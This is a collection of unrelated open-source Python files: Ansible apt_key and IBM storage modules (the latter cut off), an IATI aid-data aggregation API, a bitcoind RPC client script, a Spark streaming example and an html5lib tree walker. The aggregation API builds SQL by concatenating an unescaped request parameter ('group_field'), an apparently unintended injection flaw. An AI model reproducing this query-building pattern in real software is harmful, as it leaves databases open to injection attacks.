module.fail_json(cmd=cmd, msg="error fetching key from keyserver: %s" % keyserver,
rc=rc, stdout=out, stderr=err)
return True
def add_key(module, keyfile, keyring, data=None):
if data is not None:
if keyring:
cmd = "apt-key --keyring %s add -" % keyring
else:
cmd = "apt-key add -"
(rc, out, err) = module.run_command(cmd, data=data, check_rc=True, binary_data=True)
else:
if keyring:
cmd = "apt-key --keyring %s add %s" % (keyring, keyfile)
else:
cmd = "apt-key add %s" % (keyfile)
(rc, out, err) = module.run_command(cmd, check_rc=True)
return True
def remove_key(module, key_id, keyring):
# FIXME: use module.run_command, fail at point of error and don't discard useful stdin/stdout
if keyring:
cmd = 'apt-key --keyring %s del %s' % (keyring, key_id)
else:
cmd = 'apt-key del %s' % key_id
(rc, out, err) = module.run_command(cmd, check_rc=True)
return True
def main():
module = AnsibleModule(
argument_spec=dict(
id=dict(required=False, default=None),
url=dict(required=False),
data=dict(required=False),
file=dict(required=False),
key=dict(required=False),
keyring=dict(required=False),
validate_certs=dict(default='yes', type='bool'),
keyserver=dict(required=False),
state=dict(required=False, choices=['present', 'absent'], default='present')
),
supports_check_mode=True
)
key_id = module.params['id']
url = module.params['url']
data = module.params['data']
filename = module.params['file']
keyring = module.params['keyring']
state = module.params['state']
keyserver = module.params['keyserver']
changed = False
# we use the "short" id: key_id[-8:], short_format=True
# it's a workaround for https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1481871
if key_id:
try:
_ = int(key_id, 16)
if key_id.startswith('0x'):
key_id = key_id[2:]
key_id = key_id.upper()[-8:]
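# e.g. '0x36a1d7869245c8950f966e92d8576a8ba88d21e9' passes the hex
# check, loses the '0x', and is reduced to 'A88D21E9'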
except ValueError:
module.fail_json(msg="Invalid key_id", id=key_id)
# FIXME: I think we have a common facility for this, if not, want
check_missing_binaries(module)
short_format = True
keys = all_keys(module, keyring, short_format)
return_values = {}
if state == 'present':
if key_id and key_id in keys:
module.exit_json(changed=False)
else:
if not filename and not data and not keyserver:
data = download_key(module, url)
if key_id and key_id in keys:
module.exit_json(changed=False)
else:
if module.check_mode:
module.exit_json(changed=True)
if filename:
add_key(module, filename, keyring)
elif keyserver:
import_key(module, keyring, keyserver, key_id)
else:
add_key(module, "-", keyring, data)
changed=False
keys2 = all_keys(module, keyring, short_format)
if len(keys) != len(keys2):
changed=True
if key_id and not key_id in keys2:
module.fail_json(msg="key does not seem to have been added", id=key_id)
module.exit_json(changed=changed)
elif state == 'absent':
if not key_id:
module.fail_json(msg="key is required")
if key_id in keys:
if module.check_mode:
module.exit_json(changed=True)
if remove_key(module, key_id, keyring):
changed=True
else:
# FIXME: module.fail_json or exit-json immediately at point of failure
module.fail_json(msg="error removing key_id", **return_values)
module.exit_json(changed=changed, **return_values)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
main()
| gpl-3.0 |
bryanph/OIPA | OIPA/api/v3/resources/aggregation_resources.py | 1 | 18208 | # Tastypie specific
from tastypie.resources import ModelResource
# cache specific
from api.cache import NoTransformCache
from iati.models import AidType
from iati.models import Activity
from cache.validator import Validator
# Direct sql specific
import ujson
from django.db import connection
from django.http import HttpResponse
# Helpers
from api.v3.resources.custom_call_helper import CustomCallHelper
class ActivityAggregatedAnyResource(ModelResource):
class Meta:
queryset = Activity.objects.none()
resource_name = 'activity-aggregate-any'
include_resource_uri = True
cache = NoTransformCache()
allowed_methods = ['get']
def get_list(self, request, **kwargs):
# get group by and aggregation pars
group_by_key = request.GET.get('group_by', None)
aggregation_key = request.GET.get('aggregation_key', 'iati-identifier')
group_field = request.GET.get('group_field', 'start_actual')
query = request.GET.get('query', '')
# transaction-based aggregations should be grouped on the transaction date
if aggregation_key in {'commitment', 'disbursement', 'expenditure', 'incoming-fund'}:
group_field = 't.value_date'
aggregation_element_dict = {
'iati-identifier': {
'select': 'a.id',
'type': 'count',
'from_addition': ''},
'reporting-org': {
'select': 'a.reporting_organisation_id',
'type': 'count',
'from_addition': ''},
'title': {
'select': 't.title',
'type': 'count',
'from_addition': 'JOIN iati_title as t on a.id = t.activity_id '},
'description': {
'select': 'd.description',
'type': 'count',
'from_addition': 'JOIN iati_description as d on a.id = d.activity_id '},
'commitment': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "C" '},
'disbursement': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "D" '},
'expenditure': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "E" '},
'incoming-fund': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "IF" '},
'location': {
'select': 'l.activity_id',
'type': 'count',
'from_addition': 'JOIN iati_location as l on a.id = l.activity_id '},
'policy-marker': {
'select': 'pm.policy_marker_id',
'type': 'count',
'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
'total-budget': {
'select': 'a.total_budget',
'type': 'sum',
'from_addition': ''},
}
group_by_element_dict = {
'recipient-country': {
'select': 'rc.country_id',
'from_addition': 'JOIN iati_activityrecipientcountry as rc on a.id = rc.activity_id '},
'recipient-region': {
'select': 'r.name, rr.region_id',
'from_addition': 'JOIN iati_activityrecipientregion as rr on a.id = rr.activity_id '
'join geodata_region as r on rr.region_id = r.code '},
'year': {
'select': 'YEAR('+group_field+')',
'from_addition': ''},
'sector': {
'select': 'acts.sector_id',
'from_addition': 'JOIN iati_activitysector as acts on a.id = acts.activity_id '},
'reporting-org': {
'select': 'a.reporting_organisation_id',
'from_addition': ''},
'participating-org': {
'select': 'po.name',
'from_addition': 'JOIN iati_activityparticipatingorganisation as po on a.id = po.activity_id '},
'policy-marker': {
'select': 'pm.policy_marker_id',
'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
'r.title': {
'select': 'r.title',
'from_addition': 'JOIN iati_result as r on a.id = r.activity_id ',
'where_addition': ' AND r.title = %(query)s '},
}
helper = CustomCallHelper()
cursor = connection.cursor()
# get filters
reporting_organisations = helper.get_and_query(
request,
'reporting_organisation__in',
'a.reporting_organisation_id')
recipient_countries = helper.get_and_query(request, 'countries__in', 'rc.country_id')
recipient_regions = helper.get_and_query(request, 'regions__in', 'rr.region_id')
total_budgets = helper.get_and_query(request, 'total_budget__in', 'a.total_budget')
sectors = helper.get_and_query(request, 'sectors__in', 'acts.sector_id')
if aggregation_key in aggregation_element_dict:
aggregation_info = aggregation_element_dict[aggregation_key]
aggregation_key = aggregation_info["select"]
aggregation_type = aggregation_info["type"]
aggregation_from_addition = aggregation_info["from_addition"]
aggregation_where_addition = ""
if "where_addition" in aggregation_info:
aggregation_where_addition = aggregation_info["where_addition"]
else:
return HttpResponse(ujson.dumps({
"error": "Invalid aggregation key, see included list for viable keys.",
"valid_aggregation_keys": list(aggregation_element_dict.keys())}),
content_type='application/json')
if group_by_key in group_by_element_dict:
group_by_info = group_by_element_dict[group_by_key]
group_select = group_by_info["select"]
group_from_addition = group_by_info["from_addition"]
if "where_addition" in group_by_info and query:
aggregation_where_addition += group_by_info["where_addition"]
else:
return HttpResponse(ujson.dumps({
"error": "Invalid group by key, see included list for viable keys.",
"valid_group_by_keys": list(group_by_element_dict.keys())}),
content_type='application/json')
# make sure group key and aggregation key are set
if not group_by_key:
return HttpResponse(ujson.dumps(
"No field to group by. add parameter group_by (country/region/etc.. see docs)"),
content_type='application/json')
if not aggregation_key:
return HttpResponse(ujson.dumps(
"No field to aggregate on. add parameter aggregation_key "),
content_type='application/json')
query_select = ''.join([
'SELECT ',
aggregation_type,
'(',
aggregation_key,
') as aggregation_field, ',
group_select,
' as group_field '])
query_from = ''.join([
'FROM iati_activity as a ',
aggregation_from_addition,
group_from_addition])
query_where = ''.join([
'WHERE 1 ',
aggregation_where_addition])
query_group_by = ''.join([
'GROUP BY ',
group_select])
# fill where part
filter_string = ''.join([
'AND (',
reporting_organisations,
recipient_countries,
recipient_regions,
total_budgets,
sectors,
')'])
if filter_string == 'AND ()':
filter_string = ""
elif 'AND ()' in filter_string:
filter_string = filter_string[:-6]
query_where += filter_string
if not filter_string and query_from == 'FROM iati_activity as a ':
if group_by_key == "country":
query_select = 'SELECT count(activity_id) as aggregation_field, country_id as group_field '
query_from = "FROM iati_activityrecipientcountry "
query_group_by = "GROUP BY country_id"
elif group_by_key == "region":
query_select = 'SELECT count(activity_id) as aggregation_field, region_id as group_field '
query_from = "FROM iati_activityrecipientregion "
query_group_by = "GROUP BY region_id"
elif group_by_key == "sector":
query_select = 'SELECT count(activity_id) as aggregation_field, sector_id as group_field '
query_from = "FROM iati_activitysector "
query_group_by = "GROUP BY sector_id"
cursor.execute(query_select + query_from + query_where + query_group_by, {"query": query, })
results1 = helper.get_fields(cursor=cursor)
options = []
for r in results1:
options.append(r)
return HttpResponse(ujson.dumps(options), content_type='application/json')
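# For illustration (hypothetical request), group_by=recipient-country
# with aggregation_key=commitment and no filters produces roughly:
#
# SELECT sum(t.value) as aggregation_field, rc.country_id as group_field
# FROM iati_activity as a
# JOIN iati_transaction as t on a.id = t.activity_id
# JOIN iati_activityrecipientcountry as rc on a.id = rc.activity_id
# WHERE 1 AND t.transaction_type_id = "C"
# GROUP BY rc.country_id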
class ActivityAggregatedAnyNamesResource(ModelResource):
class Meta:
# aid_type is only used as a dummy queryset
queryset = AidType.objects.all()
resource_name = 'activity-aggregate-any-names'
include_resource_uri = True
cache = NoTransformCache()
allowed_methods = ['get']
def get_list(self, request, **kwargs):
# get group by and aggregation pars
group_by_key = request.GET.get("group_by", None) # valid : country, region, year, sector, reporting org
aggregation_key = request.GET.get("aggregation_key", "iati-identifier")
group_field = request.GET.get("group_field", "start_actual") # used for year filtering, valid : start_planned, start_actual, end_planned, end_actual, defaults to start_actual
# transaction-based aggregations should be grouped on the transaction date
if aggregation_key in {'commitment', 'disbursement', 'incoming-fund'}:
group_field = "t.value_date"
aggregation_element_dict = {
'iati-identifier': {
'select': 'a.id',
'type': 'count',
'from_addition': ''},
'reporting-org': {
'select': 'a.reporting_organisation_id',
'type': 'count',
'from_addition': ''},
'title': {
'select': 't.title',
'type': 'count',
'from_addition': 'JOIN iati_title as t on a.id = t.activity_id '},
'description': {
'select': 'd.description',
'type': 'count',
'from_addition': 'JOIN iati_description as d on a.id = d.activity_id '},
'commitment': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "C" '},
'disbursement': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "D" '},
'incoming-fund': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "IF" '},
'location': {
'select': 'l.activity_id',
'type': 'count',
'from_addition': 'JOIN iati_location as l on a.id = l.activity_id '},
'policy-marker': {
'select': 'pm.policy_marker_id',
'type': 'count',
'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
'total-budget': {
'select': 'a.total_budget',
'type': 'sum',
'from_addition': ''},
# 'recipient-country': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
# 'recipient-region': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
# 'year': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
# 'sector': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
}
group_by_element_dict = {
'recipient-country': {
'select': 'rc.country_id',
'from_addition': 'JOIN iati_activityrecipientcountry as rc on a.id = rc.activity_id '},
'recipient-region': {
'select': 'rr.region_id',
'from_addition': 'JOIN iati_activityrecipientregion as rr on a.id = rr.activity_id '},
'year': {
'select': 'YEAR('+group_field+')',
'from_addition': ''},
'sector': {
'select': 'acts.sector_id',
'from_addition': 'JOIN iati_activitysector as acts on a.id = acts.activity_id '},
'reporting-org': {
'select': 'a.reporting_organisation_id',
'from_addition': 'JOIN iati_organisation as o on a.reporting_organisation_id = o.code '},
'participating-org': {
'select': 'po.name',
'from_addition': 'JOIN iati_activityparticipatingorganisation as po on a.id = po.activity_id '},
'policy-marker': {
'select': 'pm.policy_marker_id',
'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
}
# check if call is cached using validator.is_cached
# check if call contains flush, if it does the call comes from the cache updater and shouldn't return cached results
validator = Validator()
cururl = request.META['PATH_INFO'] + "?" + request.META['QUERY_STRING']
if not 'flush' in cururl and validator.is_cached(cururl):
return HttpResponse(validator.get_cached_call(cururl), content_type='application/json')
helper = CustomCallHelper()
cursor = connection.cursor()
# get filters
reporting_organisations = helper.get_and_query(request, 'reporting_organisation__in', 'a.reporting_organisation_id')
recipient_countries = helper.get_and_query(request, 'countries__in', 'rc.country_id')
recipient_regions = helper.get_and_query(request, 'regions__in', 'rr.region_id')
total_budgets = helper.get_and_query(request, 'total_budget__in', 'a.total_budget')
sectors = helper.get_and_query(request, 'sectors__in', 'acts.sector_id')
if aggregation_key in aggregation_element_dict:
aggregation_info = aggregation_element_dict[aggregation_key]
aggregation_key = aggregation_info["select"]
aggregation_type = aggregation_info["type"]
aggregation_from_addition = aggregation_info["from_addition"]
aggregation_where_addition = ""
if "where_addition" in aggregation_info:
aggregation_where_addition = aggregation_info["where_addition"]
else:
return HttpResponse(ujson.dumps({"error": "Invalid aggregation key, see included list for viable keys.","valid_aggregation_keys": list(aggregation_element_dict.keys())}), content_type='application/json')
if group_by_key in group_by_element_dict:
group_by_info = group_by_element_dict[group_by_key]
group_select = group_by_info["select"]
group_from_addition = group_by_info["from_addition"]
else:
return HttpResponse(ujson.dumps({"error": "Invalid group by key, see included list for viable keys.","valid_group_by_keys": list(group_by_element_dict.keys())}), content_type='application/json')
# make sure group key and aggregation key are set
if not group_by_key:
return HttpResponse(ujson.dumps("No field to group by. add parameter group_by (country/region/etc.. see docs)"), content_type='application/json')
if not aggregation_key:
return HttpResponse(ujson.dumps("No field to aggregate on. add parameter aggregation_key (iati-identifier/reporting-org/etc.. see docs)"), content_type='application/json')
#create the query
query_select = 'SELECT '+aggregation_type+'(' + aggregation_key + ') as aggregation_field, ' + group_select + ' as group_field, o.name as org_name '
query_from = 'FROM iati_activity as a ' + aggregation_from_addition + group_from_addition
query_where = 'WHERE 1 ' + aggregation_where_addition
query_group_by = 'GROUP BY ' + group_select
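    # Illustrative sketch: with group_by_key 'reporting-org' and an aggregation
    # entry of the form {'select': 'a.id', 'type': 'count', 'from_addition': ''}
    # (the commented-out entries above show this shape), the statement assembled
    # so far resembles:
    #   SELECT count(a.id) as aggregation_field,
    #          a.reporting_organisation_id as group_field, o.name as org_name
    #   FROM iati_activity as a
    #       JOIN iati_organisation as o on a.reporting_organisation_id = o.code
    #   WHERE 1
    #   GROUP BY a.reporting_organisation_id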
# fill where part
filter_string = 'AND (' + reporting_organisations + recipient_countries + recipient_regions + total_budgets + sectors + ')'
if filter_string == 'AND ()':
filter_string = ""
else:
if 'AND ()' in filter_string:
filter_string = filter_string[:-6]
query_where += filter_string
    # optimization for simple (all) queries
if not filter_string and query_from == 'FROM iati_activity as a ':
if(group_by_key == "country"):
query_select = 'SELECT count(activity_id) as aggregation_field, country_id as group_field '
query_from = "FROM iati_activityrecipientcountry "
query_group_by = "GROUP BY country_id"
elif(group_by_key == "region"):
query_select = 'SELECT count(activity_id) as aggregation_field, region_id as group_field '
query_from = "FROM iati_activityrecipientregion "
query_group_by = "GROUP BY region_id"
elif(group_by_key == "sector"):
query_select = 'SELECT count(activity_id) as aggregation_field, sector_id as group_field '
query_from = "FROM iati_activitysector "
query_group_by = "GROUP BY sector_id"
# execute query
cursor.execute(query_select + query_from + query_where + query_group_by)
results1 = helper.get_fields(cursor=cursor)
# query result -> json output
options = {}
for r in results1:
options[r['group_field']] = [r['aggregation_field'], r['org_name']]
return HttpResponse(ujson.dumps(options), content_type='application/json')
| agpl-3.0 |
pleasecoin/pls | contrib/bitrpc/bitrpc.py | 2348 | 7835 | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
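# Example invocation (assumes a local bitcoind listening on the default RPC port):
#   $ python bitrpc.py getbalance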
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
        try:
            print access.getwork(data)
        except:
            print access.getwork()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
        gen = raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported" | mit |
alunarbeach/spark | examples/src/main/python/streaming/network_wordcount.py | 85 | 1915 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Counts words in UTF8 encoded, '\n' delimited text received from the network every second.
Usage: network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Spark Streaming would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/streaming/network_wordcount.py localhost 9999`
"""
from __future__ import print_function
import sys
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: network_wordcount.py <hostname> <port>", file=sys.stderr)
exit(-1)
sc = SparkContext(appName="PythonStreamingNetworkWordCount")
ssc = StreamingContext(sc, 1)
lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2]))
counts = lines.flatMap(lambda line: line.split(" "))\
.map(lambda word: (word, 1))\
.reduceByKey(lambda a, b: a+b)
counts.pprint()
ssc.start()
ssc.awaitTermination()
| apache-2.0 |
rogerscristo/BotFWD | env/lib/python3.6/site-packages/pip/_vendor/html5lib/treewalkers/base.py | 355 | 4939 | from __future__ import absolute_import, division, unicode_literals
from xml.dom import Node
from ..constants import namespaces, voidElements, spaceCharacters
__all__ = ["DOCUMENT", "DOCTYPE", "TEXT", "ELEMENT", "COMMENT", "ENTITY", "UNKNOWN",
"TreeWalker", "NonRecursiveTreeWalker"]
DOCUMENT = Node.DOCUMENT_NODE
DOCTYPE = Node.DOCUMENT_TYPE_NODE
TEXT = Node.TEXT_NODE
ELEMENT = Node.ELEMENT_NODE
COMMENT = Node.COMMENT_NODE
ENTITY = Node.ENTITY_NODE
UNKNOWN = "<#UNKNOWN#>"
spaceCharacters = "".join(spaceCharacters)
class TreeWalker(object):
def __init__(self, tree):
self.tree = tree
def __iter__(self):
raise NotImplementedError
def error(self, msg):
return {"type": "SerializeError", "data": msg}
def emptyTag(self, namespace, name, attrs, hasChildren=False):
yield {"type": "EmptyTag", "name": name,
"namespace": namespace,
"data": attrs}
if hasChildren:
yield self.error("Void element has children")
def startTag(self, namespace, name, attrs):
return {"type": "StartTag",
"name": name,
"namespace": namespace,
"data": attrs}
def endTag(self, namespace, name):
return {"type": "EndTag",
"name": name,
"namespace": namespace}
def text(self, data):
middle = data.lstrip(spaceCharacters)
left = data[:len(data) - len(middle)]
if left:
yield {"type": "SpaceCharacters", "data": left}
data = middle
middle = data.rstrip(spaceCharacters)
right = data[len(middle):]
if middle:
yield {"type": "Characters", "data": middle}
if right:
yield {"type": "SpaceCharacters", "data": right}
def comment(self, data):
return {"type": "Comment", "data": data}
def doctype(self, name, publicId=None, systemId=None):
return {"type": "Doctype",
"name": name,
"publicId": publicId,
"systemId": systemId}
def entity(self, name):
return {"type": "Entity", "name": name}
def unknown(self, nodeType):
return self.error("Unknown node type: " + nodeType)
class NonRecursiveTreeWalker(TreeWalker):
def getNodeDetails(self, node):
raise NotImplementedError
def getFirstChild(self, node):
raise NotImplementedError
def getNextSibling(self, node):
raise NotImplementedError
def getParentNode(self, node):
raise NotImplementedError
def __iter__(self):
currentNode = self.tree
while currentNode is not None:
details = self.getNodeDetails(currentNode)
type, details = details[0], details[1:]
hasChildren = False
if type == DOCTYPE:
yield self.doctype(*details)
elif type == TEXT:
for token in self.text(*details):
yield token
elif type == ELEMENT:
namespace, name, attributes, hasChildren = details
if (not namespace or namespace == namespaces["html"]) and name in voidElements:
for token in self.emptyTag(namespace, name, attributes,
hasChildren):
yield token
hasChildren = False
else:
yield self.startTag(namespace, name, attributes)
elif type == COMMENT:
yield self.comment(details[0])
elif type == ENTITY:
yield self.entity(details[0])
elif type == DOCUMENT:
hasChildren = True
else:
yield self.unknown(details[0])
if hasChildren:
firstChild = self.getFirstChild(currentNode)
else:
firstChild = None
if firstChild is not None:
currentNode = firstChild
else:
while currentNode is not None:
details = self.getNodeDetails(currentNode)
type, details = details[0], details[1:]
if type == ELEMENT:
namespace, name, attributes, hasChildren = details
if (namespace and namespace != namespaces["html"]) or name not in voidElements:
yield self.endTag(namespace, name)
if self.tree is currentNode:
currentNode = None
break
nextSibling = self.getNextSibling(currentNode)
if nextSibling is not None:
currentNode = nextSibling
break
else:
currentNode = self.getParentNode(currentNode)
| mit |
thnee/ansible | lib/ansible/modules/storage/ibm/ibm_sa_host.py | 61 | 3264 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 IBM CORPORATION
# Author(s): Tzur Eliyahu <tzure@il.ibm.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: ibm_sa_host
short_description: Adds hosts to or removes them from IBM Spectrum Accelerate Family storage systems.
version_added: "2.7"
description:
- "This module adds hosts to or removes them from IBM Spectrum Accelerate Family storage systems."
options:
host:
description:
- Host name.
required: true
state:
description:
- Host state.
required: true
default: "present"
choices: [ "present", "absent" ]
cluster:
description:
- The name of the cluster to include the host.
required: false
domain:
description:
- The domains the cluster will be attached to.
To include more than one domain,
separate domain names with commas.
To include all existing domains, use an asterisk ("*").
required: false
iscsi_chap_name:
description:
- The host's CHAP name identifier
required: false
iscsi_chap_secret:
description:
- The password of the initiator used to
            authenticate to the system when CHAP is enabled
required: false
extends_documentation_fragment:
- ibm_storage
author:
- Tzur Eliyahu (@tzure)
'''
EXAMPLES = '''
- name: Define new host.
ibm_sa_host:
host: host_name
state: present
username: admin
password: secret
endpoints: hostdev-system
- name: Delete host.
ibm_sa_host:
host: host_name
state: absent
username: admin
password: secret
endpoints: hostdev-system
'''
RETURN = '''
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ibm_sa_utils import execute_pyxcli_command, \
connect_ssl, spectrum_accelerate_spec, is_pyxcli_installed
def main():
argument_spec = spectrum_accelerate_spec()
argument_spec.update(
dict(
state=dict(default='present', choices=['present', 'absent']),
host=dict(required=True),
cluster=dict(),
domain=dict(),
iscsi_chap_name=dict(),
iscsi_chap_secret=dict()
)
)
module = AnsibleModule(argument_spec)
is_pyxcli_installed(module)
xcli_client = connect_ssl(module)
host = xcli_client.cmd.host_list(
host=module.params['host']).as_single_element
state = module.params['state']
state_changed = False
if state == 'present' and not host:
state_changed = execute_pyxcli_command(
